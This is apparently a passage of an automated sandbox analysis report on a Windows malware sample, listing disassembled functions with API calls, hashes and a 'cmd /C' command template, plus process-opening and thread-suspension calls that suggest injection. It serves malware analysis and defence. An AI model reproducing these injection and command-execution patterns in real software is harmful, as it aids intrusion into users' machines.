  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
